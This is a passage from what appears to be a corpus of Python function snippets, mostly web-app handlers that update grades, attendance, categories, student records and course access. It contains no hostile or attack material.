alloted.'\n\t\t\treturn render(request, \"editAttendance.html\", context_dict)\n\t\ttry:\n\t\t\tif attendance.student != student:\n\t\t\t\tattendance.student = student\n\t\t\t\tupdate_fields.append('student')\n\t\t\t\tactivity += 'Changed student to ' + str(student) + '.\\n'\n\t\t\tif attendance.total_attendance != total:\n\t\t\t\tattendance.total_attendance = total\n\t\t\t\tupdate_fields.append('total_attendance')\n\t\t\t\tactivity += 'Changed total attendance to ' + str(total) + '.\\n'\n\t\t\tif attendance.obtained_attendance != obtained:\n\t\t\t\tattendance.obtained_attendance = obtained\n\t\t\t\tupdate_fields.append('obtained_attendance')\n\t\t\t\tactivity += 'Changed obtained attendance to' + str(obtained) + '.\\n'\n\t\t\tif str(attendance.subject.pk) != str(subject):\n\t\t\t\tattendance.subject = models.Subject.objects.get(pk=subject)\n\t\t\t\tupdate_fields.append('subject')\n\t\t\t\tactivity += 'Changed subject to ' + str(subject) + '.\\n'\n\t\t\tattendance.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit attendance\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated Attendance.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_attendance_info(attendance))\n\tfor i in context_dict['subjects']:\n\t\t# use for dynamic\n\t\ttry: del 
context_dict['all_subjects'][i]\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-attendance')\n\treturn render(\n\t\trequest, \"editAttendance.html\", context_dict\n\t)", "def put(self, id=None):\n\n if not id:\n return {'msg':'Missing achievement id.'}, 400\n\n if not all(\n [request.form.get('roll_no'),\n request.form.get('name'),\n request.form.get('batch'),\n request.form.get('programme'),\n request.form.get('category'),]):\n \n return {'msg':'Field(s) missing.'}, 400\n\n try:\n ach = AcademicAchievement.query.get(id)\n\n if not ach:\n return {'msg':'Academic achievement not found'}, 404\n\n ach.roll_no = request.form.get('roll_no'),\n ach.name = request.form.get('name'),\n ach.batch = checkBatch(request.form.get('batch')),\n ach.programme = request.form.get('programme'),\n ach.category = request.form.get('category'),\n\n ach.save()\n data = ach.toDict()\n\n return {'data' : data}, 200\n\n except (ValueError, mongoalchemy.exceptions.BadValueException) as e:\n print(e)\n return {'msg':'Invalid form data.'}, 400\n\n except Exception as e:\n print(e)\n return {'msg':'Could not modify academic achievement.'}, 500", "def updateStudentProposalReferences(request):\n\n return updateReferencesForModel('student_proposal')", "def AddGrade(self, student, discipline, grade_value):\n if not self.__data['s'].HasKey(student.ID):\n raise NonExistentItemIDError(\"Student does not exist.\")\n if not self.__data['d'].HasKey(discipline.ID):\n raise NonExistentItemIDError(\"Discipline does not exist.\")\n self.__data['g'].AddItems([Grade(self.__data['g'].GetSafeKey(), student.ID, discipline.ID, grade_value)])\n self.__undo_list.append(['g'])\n self.__redo_list.clear()", "def update_attempt_with_grading(db, attempt_id, grading):\n attrs = {}\n if grading['is_solution']:\n attrs['is_unsolved'] = False\n if grading['is_full_solution']:\n attrs['is_fully_solved'] = True\n if len(attrs) > 0:\n db.update_row(db.tables.attempts, attempt_id, attrs)", "def editConcept(self):\n if self.concept_list.currentIndex().isValid():\n concept = self.concept_list.selectedItems()[0].data(Qt.UserRole)[0]\n subcategory = self.concept_list.selectedItems()[0].data(Qt.UserRole)[1]\n dlg = EditConceptDialog(self, concept, subcategory)\n if dlg.exec_():\n concept, subcategory = dlg.getValue()\n self.db.update_concept(concept)\n self.db.update_subcategory(subcategory)\n self.search()", "def save(self, *args, **kwargs):\n super(CurriculumGuideSection, self).save(*args, **kwargs)\n self.clean()", "def update_employee(employee):\n employee_id = get_employee_input_int(\"Enter the employee id you want to update\")\n newGrade = get_employee_input_int(\"Enter the new grade for \")\n db.update_employee(employee_id, newGrade)\n print(employee.full_name + \"'s grade value has been updated to :-> \", newGrade)", "def change_view(self, request, object_id, form_url='', extra_context=None):\n section = models.Section.objects.filter(pk=object_id)\\\n .prefetch_related(\"facility__experiment\",\n \"participants\")\\\n .first()\n exp_id = section.facility.experiment.id\n # create bulk forms\n bulk_add_change_frm = create_bulk_add_change_form(request, exp_id)\n bulk_del_frm = create_bulk_delete_form(request)\n # attach site id and bulk forms to 'extra_context'\n extra_context = extra_context or {}\n extra_context['section_id'] = object_id\n extra_context[\"bulk_add_change_form\"] = bulk_add_change_frm\n extra_context['bulk_delete_form'] = bulk_del_frm\n # print extra_context\n return super(SectionAdmin, 
self).change_view(\n request, object_id, form_url, extra_context=extra_context)", "def updateStudents(request):\n\n return updateRole('gsoc_student')", "def set_grade(\n self,\n assignment_id,\n student_id,\n grade_value,\n gradebook_id='',\n **kwargs\n ):\n # pylint: disable=too-many-arguments\n\n # numericGradeValue stringified because 'x' is a possible\n # value for excused grades.\n grade_info = {\n 'studentId': student_id,\n 'assignmentId': assignment_id,\n 'mode': 2,\n 'comment': 'from MITx {0}'.format(time.ctime(time.time())),\n 'numericGradeValue': str(grade_value),\n 'isGradeApproved': False\n }\n grade_info.update(kwargs)\n log.info(\n \"student %s set_grade=%s for assignment %s\",\n student_id,\n grade_value,\n assignment_id)\n return self.post(\n 'grades/{gradebookId}'.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n data=grade_info,\n )", "def update(self, request, pk=None):\n current_user = User.objects.get(id=request.user.id)\n if current_user.is_staff:\n try:\n category = Category.objects.get(pk=pk)\n except Category.DoesNotExist:\n return Response({\"reason\": \"Doesn't Exist\"}, status=status.HTTP_400_BAD_REQUEST)\n category.label = request.data['label']\n category.approved = False\n try:\n category.save()\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n except ValidationError as ex:\n return Response({\"reason\": ex.message}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'message': \"*Sigh*, you're not changing a thing, non-admin\"},\n status=status.HTTP_403_FORBIDDEN)", "def edit_classifications(self, identifier_type, identifier):\n self.require_librarian(flask.request.library)\n\n work = self.load_work(flask.request.library,\n identifier_type, identifier)\n if isinstance(work, ProblemDetail):\n return work\n\n staff_data_source = DataSource.lookup(\n self._db, DataSource.LIBRARY_STAFF)\n\n # Previous staff classifications\n primary_identifier = work.presentation_edition.primary_identifier\n old_classifications = self._db \\\n .query(Classification) \\\n .join(Subject) \\\n .filter(\n Classification.identifier == primary_identifier,\n Classification.data_source == staff_data_source\n )\n old_genre_classifications = old_classifications \\\n .filter(Subject.genre_id != None)\n old_staff_genres = [\n c.subject.genre.name\n for c in old_genre_classifications\n if c.subject.genre\n ]\n old_computed_genres = [\n work_genre.genre.name\n for work_genre in work.work_genres\n ]\n\n # New genres should be compared to previously computed genres\n new_genres = flask.request.form.getlist(\"genres\")\n genres_changed = sorted(new_genres) != sorted(old_computed_genres)\n\n # Update audience\n new_audience = flask.request.form.get(\"audience\")\n if new_audience != work.audience:\n # Delete all previous staff audience classifications\n for c in old_classifications:\n if c.subject.type == Subject.FREEFORM_AUDIENCE:\n self._db.delete(c)\n\n # Create a new classification with a high weight\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.FREEFORM_AUDIENCE,\n subject_identifier=new_audience,\n weight=WorkController.STAFF_WEIGHT,\n )\n\n # Update target age if present\n new_target_age_min = flask.request.form.get(\"target_age_min\")\n new_target_age_min = int(\n new_target_age_min) if new_target_age_min else None\n new_target_age_max = flask.request.form.get(\"target_age_max\")\n new_target_age_max = int(\n new_target_age_max) if new_target_age_max else None\n if new_target_age_max is not None and 
new_target_age_min is not None and \\\n new_target_age_max < new_target_age_min:\n return INVALID_EDIT.detailed(_(\"Minimum target age must be less than maximum target age.\"))\n\n if work.target_age:\n old_target_age_min = work.target_age.lower\n old_target_age_max = work.target_age.upper\n else:\n old_target_age_min = None\n old_target_age_max = None\n if new_target_age_min != old_target_age_min or new_target_age_max != old_target_age_max:\n # Delete all previous staff target age classifications\n for c in old_classifications:\n if c.subject.type == Subject.AGE_RANGE:\n self._db.delete(c)\n\n # Create a new classification with a high weight - higher than audience\n if new_target_age_min and new_target_age_max:\n age_range_identifier = \"%s-%s\" % (\n new_target_age_min, new_target_age_max)\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.AGE_RANGE,\n subject_identifier=age_range_identifier,\n weight=WorkController.STAFF_WEIGHT * 100,\n )\n\n # Update fiction status\n # If fiction status hasn't changed but genres have changed,\n # we still want to ensure that there's a staff classification\n new_fiction = True if flask.request.form.get(\n \"fiction\") == \"fiction\" else False\n if new_fiction != work.fiction or genres_changed:\n # Delete previous staff fiction classifications\n for c in old_classifications:\n if c.subject.type == Subject.SIMPLIFIED_FICTION_STATUS:\n self._db.delete(c)\n\n # Create a new classification with a high weight (higher than genre)\n fiction_term = \"Fiction\" if new_fiction else \"Nonfiction\"\n classification = primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_FICTION_STATUS,\n subject_identifier=fiction_term,\n weight=WorkController.STAFF_WEIGHT,\n )\n classification.subject.fiction = new_fiction\n\n # Update genres\n # make sure all new genres are legit\n for name in new_genres:\n genre, is_new = Genre.lookup(self._db, name)\n if not isinstance(genre, Genre):\n return GENRE_NOT_FOUND\n if genres[name].is_fiction is not None and genres[name].is_fiction != new_fiction:\n return INCOMPATIBLE_GENRE\n if name == \"Erotica\" and new_audience != \"Adults Only\":\n return EROTICA_FOR_ADULTS_ONLY\n\n if genres_changed:\n # delete existing staff classifications for genres that aren't being kept\n for c in old_genre_classifications:\n if c.subject.genre.name not in new_genres:\n self._db.delete(c)\n\n # add new staff classifications for new genres\n for genre in new_genres:\n if genre not in old_staff_genres:\n classification = primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_GENRE,\n subject_identifier=genre,\n weight=WorkController.STAFF_WEIGHT\n )\n\n # add NONE genre classification if we aren't keeping any genres\n if len(new_genres) == 0:\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_GENRE,\n subject_identifier=SimplifiedGenreClassifier.NONE,\n weight=WorkController.STAFF_WEIGHT\n )\n else:\n # otherwise delete existing NONE genre classification\n none_classifications = self._db \\\n .query(Classification) \\\n .join(Subject) \\\n .filter(\n Classification.identifier == primary_identifier,\n Subject.identifier == SimplifiedGenreClassifier.NONE\n ) \\\n .all()\n for c in none_classifications:\n self._db.delete(c)\n\n # Update presentation\n policy = PresentationCalculationPolicy(\n classify=True,\n regenerate_opds_entries=True,\n regenerate_marc_record=True,\n update_search_index=True\n 
)\n work.calculate_presentation(policy=policy)\n\n return Response(\"\", 200)", "def test_superuser_edit_assessment(self):\n req, resp = data.get_assessment(self.contract['id'])\n\n response = self.superuser.put(self.assessment_report_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response = self.superuser.patch(self.assessment_report_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def detail_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n assignments = assignmentype.assignment_set.\\\n annotate(std=StdDev('evalassignment__grade_assignment'),\n mean=Avg('evalassignment__grade_assignment'))\n if assignmentype:\n context['assignmentype'] = assignmentype\n context['assignments'] = assignments\n context['range_grades'] = range(assignmentype.nb_grading)\n return render(request, 'gradapp/detail_assignmentype.html',\n context)\n else:\n return redirect('gradapp:list_assignmentypes_running')", "def test_update_category(self):\n self.update_success(self.test_data['pants'], self.test_data['shirts'])", "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def update_course_index(self, updated_index_entry):\r\n self.db_connection.update_course_index(updated_index_entry)", "def update_experience(uid, rid, increment):\n errmsg = []\n\n experience = Experience.query.filter(Experience.uid == uid).filter(Experience.rid == rid).first()\n if not experience:\n errmsg.append(\"Experience entry does not exist for the given user ID and restaurant ID.\")\n elif increment < 0:\n errmsg.append(\"Experience cannot be incremented by a negative number.\")\n\n if not errmsg:\n old_level = convert_experience_to_level(experience.experience)\n milestone = get_milestone(uid, rid)\n Experience.query.filter(Experience.uid == uid).filter(Experience.rid == rid).update(dict(experience=experience.experience + increment))\n db.session.commit()\n if milestone:\n new_level = convert_experience_to_level(experience.experience)\n if old_level < new_level and new_level == int(milestone[\"level\"]):\n update_points(uid, rid, milestone[\"reward\"])\n return None\n\n return errmsg", "def coeff_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n if assignmentype:\n nb_questions = assignmentype.nb_questions\n if request.method == 'POST':\n form = CoeffForm(request.POST,\n nb_questions=nb_questions)\n if form.is_valid():\n assignmentype.questions_coeff = [form.cleaned_data['coeff_%s'\n % i] for i\n in range(1, assignmentype.\n nb_questions + 1)]\n assignmentype.save()\n # Compute all grades\n log = tasks.compute_grades_assignmentype(assignmentype.id)\n logger.error(log)\n return redirect('/detail_assignmentype/%s/' % pk)\n else:\n questions_coeff = assignmentype.questions_coeff\n coeff = {}\n if questions_coeff:\n for i in range(1, nb_questions + 1):\n coeff['coeff_%s' % i] = assignmentype.questions_coeff[i - 1]\n else:\n coeff = dict.fromkeys(['coeff_%s' % i\n for i in range(1, nb_questions + 1)],\n None)\n form = CoeffForm(nb_questions=nb_questions,\n initial=coeff)\n context['form'] = form\n context['assignmentype'] = assignmentype\n return render(request, 'gradapp/coeff_assignmentype.html',\n context)\n return redirect('gradapp:list_assignmentypes_running')", "def 
update_course_info(self, grades_file_info):\n grades_file = os.path.join(self.path, \"grades.txt\")\n sep, header = grades_file_info\n try:\n for info in file_reading_gen(grades_file, 4, sep, header):\n # StudentID | Course | Grade | InstructorID\n student_id = info[0]\n course_code = info[1]\n grade = info[2]\n instructor_id = info[3]\n\n if student_id not in self.students:\n raise KeyError(\"Student with student id {} does not exists in students.txt\".format(student_id))\n if instructor_id not in self.instructors:\n raise KeyError(\"Instructor with instructor id {} does not exists in instructors.txt\".format(instructor_id))\n\n student = self.students[student_id]\n instructor = self.instructors[instructor_id]\n\n student.courses_completed.add(course_code)\n student.grades[course_code] = grade\n\n instructor.courses_taught.add(course_code)\n instructor.student_count[course_code] += 1\n except ValueError:\n raise ValueError(\"Invalid data in grades.txt\")\n except FileNotFoundError as e:\n print('Missing grades.txt.\\n' + str(e))", "def edit(self):\n\n pass", "def editProfile():\n form = EditProfileForm(request.form)\n if request.method == \"GET\":\n return render_template(\"/pages/editprofile.html\", form=form)\n else:\n choose = True\n section = form.category.data\n return redirect(url_for(\"editProfileSection\", section=section))", "def edit_recipe(request, **kwargs):\n template = 'recipe/add-edit-vary.html'\n pk = kwargs.get('pk')\n recipe = Recipe.objects.get(pk=pk)\n if request.method == 'POST':\n recipe_form = RecipeForm(request.POST, request.FILES, instance=recipe)\n formset = RecipeIngredientRelationshipFormSet(request.POST,\n prefix='ingredient_form')\n if formset.is_valid() and recipe_form.is_valid():\n recipe_form.save()\n for ingredient in formset.cleaned_data:\n if ingredient:\n if ingredient['id']:\n relationship = RecipeIngredientRelationship.objects.get(id=ingredient['id'].id)\n relationship.quantity = ingredient['quantity']\n relationship.ingredient = ingredient['ingredient']\n relationship.save()\n else:\n new = RecipeIngredientRelationship(recipe=recipe,\n quantity=ingredient['quantity'],\n ingredient=ingredient['ingredient'])\n new.save()\n return HttpResponseRedirect('/')\n else:\n recipe_form = RecipeForm(instance=recipe)\n formset = RecipeIngredientRelationshipFormSet(queryset=recipe.ingredients_in_recipe.all(), prefix='ingredient_form')\n return render(request, template, {'formset': formset,\n 'recipe_form': recipe_form,\n 'page_title': 'Edit Recipe'})", "def save_course(self):\r\n self.course.save()\r\n self.store.update_item(self.course, self.user.id)", "def edit_entry():\n if not check_admin_logged() :\n abort(403)\n\n title = request.form['title']\n category = request.form['category']\n buydate = request.form['buydate']\n ssid = decrypt_book_record(request.form['ssid'])\n\n if not check_items_in_form(title, category, buydate):\n return redirect(url_for('show_entries_admin'))\n\n edited_entry = Entries.query.filter_by(\n id=ssid, title=title, category=category, \\\n buydate=buydate).first()\n\n if edited_entry is not None :\n edited_entry.introduction = request.form['introduction']\n if db.session.is_modified(edited_entry) :\n # commit only if something is modified\n try :\n db.session.commit()\n except IntegrityError as e :\n log_error('error when edit:')\n log_error(e.message)\n flash(u'数据库操作失败导致更新失败!请看后台日志')\n flash(u'成功更新条目')\n\n return redirect(url_for('show_entries_admin'))", "def careerCatagory_edit(request):\r\n action = 
tool.get_param_by_request(request.GET, 'action', \"add\", str)\r\n page_index = tool.get_param_by_request(request.GET, 'page_index', 1, int)\r\n\r\n careerCatagory = None\r\n if action == \"edit\" or action == \"show\":\r\n _id = tool.get_param_by_request(request.GET, 'id', 0, int)\r\n careerCatagory = api_careerCatagory.get_career_catagory_by_id(_id)\r\n\r\n if careerCatagory.is_error():\r\n return render_to_response(\"404.html\", {}, context_instance=RequestContext(request))\r\n\r\n careerCatagory = careerCatagory.result()[0]\r\n\r\n c = {\"careerCatagory\": careerCatagory, \"action\": action, \"page_index\": page_index}\r\n\r\n return render_to_response(\"mz_course/careerCatagory_save.html\", c, context_instance=RequestContext(request))", "def updateStudentProjectReferences(request):\n\n return updateReferencesForModel('student_project')", "def edit_student(request, s_id):\n user = CustomUser.objects.get(id=s_id)\n student = Student.objects.get(user_id=s_id)\n\n if request.method == 'POST':\n user_edit_form = EditUserForm(request.POST, instance=user)\n student_edit_form = EditStudentForm(request.POST, instance=student)\n\n if user_edit_form.is_valid() and student_edit_form.is_valid():\n user_edit_form.save()\n student_edit_form.save()\n messages.success(request, \"The student's account has been edited successfully\")\n return redirect('student_account', s_id=s_id)\n else:\n messages.error(request, \"The form has not been filled correctly\")\n\n else:\n user_edit_form = EditUserForm(instance=user)\n student_edit_form = EditStudentForm(instance=student)\n\n context = {\n 'user_edit_form': user_edit_form,\n 'student_edit_form': student_edit_form\n }\n return render(request, 'main/edit_student.html', {'user_edit_form': context['user_edit_form'],\n 'student_edit_form': context['student_edit_form']})", "def put(self, request, pk, format=None):\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> requset:{}, pk: {}\".format(\n request.query_params, pk))\n\n try:\n program_id = request.META.get('HTTP_X_SVMS_PROGRAM_ID')\n if not program_id:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, \"Program Id not found\"))\n return Response(\n {\"error\": \"Program Id not found\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n if 'category' in request.data and 'job_title' in request.data[\n 'category']:\n job_title_data = request.data['category']['job_title']\n for data in job_title_data:\n job_title_data_list = {}\n for each_data in data:\n if each_data in EDITABLE_FIELDS:\n job_title_data_list.update(\n {each_data: data[each_data]}\n )\n job_title_obj = JobTitleDetailView.get_object(\n self, data['id'])\n\n if job_title_obj.program_id != program_id:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, \"Not authorized to edit\"))\n return Response(\n {\"error\": \"Not authorized to edit\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n serializer = JobTitleSerializer(\n instance=job_title_obj, data=job_title_data_list,\n partial=True)\n if serializer.is_valid():\n serializer.save()\n else:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk,\n \"Only Job Level, Description and Job Tag is editable\"))\n return Response(\n {\n \"error\": \"Only Job Level, Description and Job Tag is editable\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n catalog_obj = self.get_object(pk)\n serializer = JobCatalogSerializer(catalog_obj)\n settings.LOGGER.info(\n 
\"JobCatalogDetailViewList >> PUT >> pk: {}, Response:{} \".format(\n pk, serializer.data))\n\n return Response(\n serializer.data,\n status=status.HTTP_200_OK\n )\n except Exception as e:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, e))\n return Response({\"error\": \"{}\".format(e)},\n status=status.HTTP_400_BAD_REQUEST)", "def editItem(category_item_id):\n editedItem = db.findItem(id=category_item_id)\n if editedItem.user_id != login_session['user_id']:\n return not_authorized()\n if request.method == 'POST':\n db.updateItem(editedItem, request.form)\n return redirect(url_for('showCatalog'))\n return render_template(\n 'edit_item.html', categories=db.getAllCategories(), item=editedItem)", "def update_category(data, key):\n try:\n category = Categories.objects.get(pk=key, is_delete=False)\n except ObjectDoesNotExist:\n return Response({'status': CATEGORY_NOT_FOUND}, status=status.HTTP_404_NOT_FOUND)\n\n valid_fields = ['period_number', 'period_name', 'terms']\n correct_details = True\n for field in data:\n if field in valid_fields:\n setattr(category, field, data[field])\n else:\n correct_details = False\n break\n\n if correct_details:\n category.save()\n return Response({'status': CATEGORY_UPDATED}, status=status.HTTP_200_OK)\n return Response({'status': INVALID_FIELDS}, status=status.HTTP_400_BAD_REQUEST)", "def item_update(request):\n if request.method == 'POST':\n item_to_update = get_object_or_404(StockItem, pk=request.POST['id'])\n item_to_update.name = request.POST['name']\n item_to_update.count = int(request.POST['count'])\n item_to_update.date_of_expiration = request.POST['exp']\n item_to_update.fk_category = Category.objects.get(name=request.POST['cat'])\n item_to_update.fk_subcategory = SubCategory.objects.get(name=request.POST['subcat'])\n item_to_update.notes = request.POST['notes']\n item_to_update.save()\n return HttpResponse(status=200)", "def this_is_the_grade(self, grade_to_set):\n\n\t\tcmds.intField(self.grade_intField, edit = True, value = grade_to_set['grade_value'])\n\t\tself.update_subcategory('intField')\n\t\tif grade_to_set['grade_value'] is not '':\n\t\t\tcmds.scrollField(self.comments_text_field, edit = True, text = grade_to_set['comment_text'])\n\t\t\tself.update_subcategory('comments_text')\n\t\tif grade_to_set['default_comments_text'] is not '':\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = grade_to_set['default_comments_text'])\n\t\t\tself.update_subcategory('default_comments_text')\n\t\tif grade_to_set['example_comments_text'] is not '':\n\t\t\tcmds.scrollField(self.example_comments, edit = True, text = grade_to_set['example_comments_text'])\n\t\t\tself.update_subcategory('example_comments_text')\n\n\t\tself.auto_flagged_list = grade_to_set.get('examples', [])\n\t\tself.log('auto_flagged_list updated: \\n{}'.format(self.auto_flagged_list))", "def __ui_update_student(self):\n student_id = input(\"student id: \")\n student_name = input(\"student discipline_name: \")\n disciplines_list = []\n\n discipline_name = None\n while discipline_name != '':\n discipline_name = input(\"Discipline discipline_name: \")\n if discipline_name == '':\n break\n elif self.__discipline_controller.find_by_name(discipline_name) is not None:\n disciplines_list.append(discipline_name)\n print(\"Add discipline successful\\n\")\n else:\n print(\"Invalid discipline!\")\n\n try:\n self.__student_controller.update_student(student_id, student_name, disciplines_list)\n print(\"Update student successful\\n\")\n 
except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return", "def grade(student, request, course, keep_raw_scores=False):\r\n with manual_transaction():\r\n return _grade(student, request, course, keep_raw_scores)", "def update_shift(self, shift_id, pro, mid, beginner):\n try:\n self.db_handler.update_shift_by_id(shift_id, pro, mid, beginner)\n self.logger.write_to_log('shift updated', 'model')\n except Exception as err:\n method_name = sys._getframe().f_code.co_name\n\n self.logger.write_to_log('exception', 'model')\n self.logger.write_to_err_log(f'exception in method {method_name} - {err}', 'model')", "def test_update_entry_courses(self):\r\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\r\n pass", "def give_extra_credit(grades,netids,bonus):\n # No accumulator. This is a procedure\n \n for student in netids:\n if student in grades: # Test if student is a key in grades\n grades[student] = grades[student]+bonus", "def put(self, request, pk):\n return self.update(request, pk)", "def update_decision(request, sub_id):\n submission = get_object_or_404(Submission, id=sub_id)\n validate_chair_access(request.user, submission.conference)\n stage, _ = ReviewStage.objects.get_or_create(\n submission=submission,\n num_reviews_required=(\n submission.stype.num_reviews if submission.stype else 0),\n locked=False)\n decision = stage.decision\n form = UpdateReviewDecisionForm(request.POST, instance=decision)\n if form.is_valid():\n form.save()\n return JsonResponse(status=200, data={})\n return JsonResponse(status=500, data={'errors': form.errors})", "def _add_grade_to_row(self, component, score):\r\n component_index = self.components.setdefault(component, len(self.components))\r\n self._current_row[component_index] = score", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = self.request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'update-course-category', {'key': key}):\n return\n\n if not roles.Roles.is_super_admin():\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': self.KEY})\n return\n\n payload = request.get('payload')\n updated_dict = transforms.json_to_dict(\n transforms.loads(payload), self.get_schema_dict())\n\n errors = []\n self.apply_updates(updated_dict, errors)\n if not errors:\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def modify_access(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n course = get_course_with_access(\r\n request.user, 'instructor', course_id, depth=None\r\n )\r\n try:\r\n user = get_student_from_identifier(request.GET.get('unique_student_identifier'))\r\n except User.DoesNotExist:\r\n response_payload = {\r\n 'unique_student_identifier': request.GET.get('unique_student_identifier'),\r\n 'userDoesNotExist': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n # Check that user is active, because add_users\r\n # in common/djangoapps/student/roles.py fails\r\n # silently when we try to add an inactive user.\r\n if not user.is_active:\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'inactiveUser': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n rolename = request.GET.get('rolename')\r\n action = request.GET.get('action')\r\n\r\n if not rolename in ['instructor', 'staff', 'beta']:\r\n return 
HttpResponseBadRequest(strip_tags(\r\n \"unknown rolename '{}'\".format(rolename)\r\n ))\r\n\r\n # disallow instructors from removing their own instructor access.\r\n if rolename == 'instructor' and user == request.user and action != 'allow':\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'rolename': rolename,\r\n 'action': action,\r\n 'removingSelfAsInstructor': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n if action == 'allow':\r\n allow_access(course, user, rolename)\r\n elif action == 'revoke':\r\n revoke_access(course, user, rolename)\r\n else:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"unrecognized action '{}'\".format(action)\r\n ))\r\n\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'rolename': rolename,\r\n 'action': action,\r\n 'success': 'yes',\r\n }\r\n return JsonResponse(response_payload)", "def insert_grade(grade, form, rc):\n dbname = form[\"dbname\"]\n collname = \"grades\"\n try:\n coll = rc.client[dbname][collname]\n except (KeyError, AttributeError):\n abort(404)\n try:\n added = rc.client.insert_one(dbname, collname, grade)\n except Exception:\n traceback.print_exc()\n raise", "def update(self, request, *args, **kwargs):\n response = super(CategoryViewSet).update(self, request, *args, *kwargs)\n response.data['message'] = \"Categoria ha sido editada\"", "def update_search_parameters(self, selected_gender, selected_category, selected_subcategory):\r\n self.model.set_gender(selected_gender)\r\n self.model.set_category(selected_category)\r\n self.model.set_subcategory(selected_subcategory)\r\n self.model.fetch_results()", "def update_enrollment(context: dict) -> dict:\n enrollment = (\n session.query(Enrollment)\n .filter_by(\n subject_code=context[\"subject_code\"],\n student_ra=context[\"student_ra\"],\n year=context[\"year\"],\n semester=context[\"semester\"],\n )\n .first()\n )\n\n if enrollment:\n for attr in context.keys():\n setattr(enrollment, attr, context[attr])\n\n enrollment.save()\n\n return enrollment.asdict()", "def staff_form(request, pk, step=0):\n ts = get_timeslot()\n if not hasattr(ts, 'resultoptions'):\n raise PermissionDenied(\"Results menu is not yet visible.\")\n else:\n if not get_timeslot().resultoptions.Visible:\n raise PermissionDenied(\"Results menu is not yet visible.\")\n dstr = get_object_or_404(Distribution, pk=pk)\n if not hasattr(dstr, 'presentationtimeslot'):\n raise PermissionDenied('This student does not have a presentation planned. Please plan it first.')\n if not request.user.is_superuser and \\\n request.user != dstr.Proposal.Track.Head and \\\n request.user != dstr.Proposal.ResponsibleStaff and \\\n (get_grouptype('1') not in request.user.groups.all() or request.user not in dstr.Proposal.Assistants.all()) and \\\n get_grouptype('3') not in request.user.groups.all() and \\\n request.user not in dstr.presentationtimeslot.Presentations.Assessors.all():\n raise PermissionDenied(\"You are not the correct owner of this distribution. 
\"\n \"Only track heads and responsible staff can edit grades.\")\n\n cats = GradeCategory.objects.filter(TimeSlot=get_timeslot()).distinct()\n numcategories = len(cats)\n step = int(step)\n if step == 0:\n return render(request, \"results/wizard.html\", {\n \"step\": 0,\n \"pk\": pk,\n \"categories\": cats,\n \"dstr\": dstr,\n \"final\": all(f.Final is True for f in dstr.results.all()) if dstr.results.all() else False, # fix for all([])=True\n # \"files\": files,\n })\n elif step <= numcategories:\n saved = False\n cat = cats[step - 1]\n try: # existing category result\n cat_result = CategoryResult.objects.get(Distribution=dstr, Category=cat)\n initial = None\n except CategoryResult.DoesNotExist: # new result\n cat_result = CategoryResult(Distribution=dstr, Category=cat)\n # initial = {'Files': list(StudentFile.objects.filter(Type=cat_result.Category.File, Distribution=cat_result.Distribution).distinct())}\n if request.method == \"POST\": # submitted form\n if cat_result.Final:\n return render(request, \"base.html\", context={\n \"Message\": \"Category Result has already been finalized! Editing is not allowed anymore. \"\n \"If this has to be changed, contact support staff\"\n })\n # if files:\n # category_form = CategoryResultFormFile(request.POST, instance=cat_result, prefix='catform')\n # else:\n category_form = CategoryResultForm(request.POST, instance=cat_result, prefix='catform')\n aspect_forms = []\n for i, aspect in enumerate(cat.aspects.all()):\n try: # try find existing form\n aspect_result = CategoryAspectResult.objects.get(CategoryResult=cat_result, 